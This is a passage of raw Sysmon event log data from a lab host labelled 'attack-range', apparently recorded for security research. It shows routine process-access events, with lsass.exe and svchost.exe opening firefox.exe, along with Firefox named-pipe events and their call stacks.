Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.200{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000288087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.200{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.7.56076185C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.184{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.184{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.184{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.184{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.161{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-2C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.161{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-2C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.145{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.145{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.145{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.6.38957672C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.145{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.6.38957672C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.145{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.145{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.5.164223806C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.129{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla 